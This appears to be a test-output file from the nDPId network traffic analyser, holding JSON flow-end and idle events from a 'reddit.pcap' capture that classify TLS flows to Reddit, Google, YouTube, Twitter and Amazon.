-00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00722{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} -00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00729{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00725{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} -00733{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00732{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} -00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":636,"flow_first_seen":1605291687931,"flow_last_seen":1605291698785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7248,"flow_tot_l4_payload_len":748553,"flow_avg_l4_payload_len":1176,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291687896,"flow_last_seen":1605291688326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6703,"flow_avg_l4_payload_len":216,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1605291690926,"flow_last_seen":1605291691154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10872,"flow_tot_l4_payload_len":111125,"flow_avg_l4_payload_len":1068,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46806,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8556,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46808,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00712{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1605291690926,"flow_last_seen":1605291691043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8555,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2001","src_port":46810,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 